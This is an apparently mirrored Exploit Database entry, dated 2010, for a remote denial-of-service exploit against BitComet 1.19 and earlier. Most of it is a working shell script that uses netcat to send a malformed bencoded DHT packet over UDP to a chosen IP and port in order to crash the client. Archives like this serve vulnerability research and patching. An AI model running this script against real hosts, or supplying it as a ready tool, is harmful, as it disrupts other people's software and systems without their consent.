BitComet 1.19 – Remote Denial of Service

• Exploit Database
• 10 阅读

• 作者： Pierre Nogues
  日期： 2010-03-31
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11985/

• #!/bin/sh
  #
  # BitComet <= 1.19 Remote DOS Exploit
  # Pierre Nogues - http://www.indahax.com/
  #
  # Description:
  # BitComet is a torrent client
  #
  # BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
  #
  # Affected versions :
  # BitComet <= 1.19
  #
  # Plateforms :
  # Windows
  #
  # Usage :
  # ./exploit.sh ip port
  
  if [ $# -ne 2 ]; then
   echo "./exploit.sh ip port"
   exit 1
  fi
  
  nc -u $1 $2 << .
  d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
  .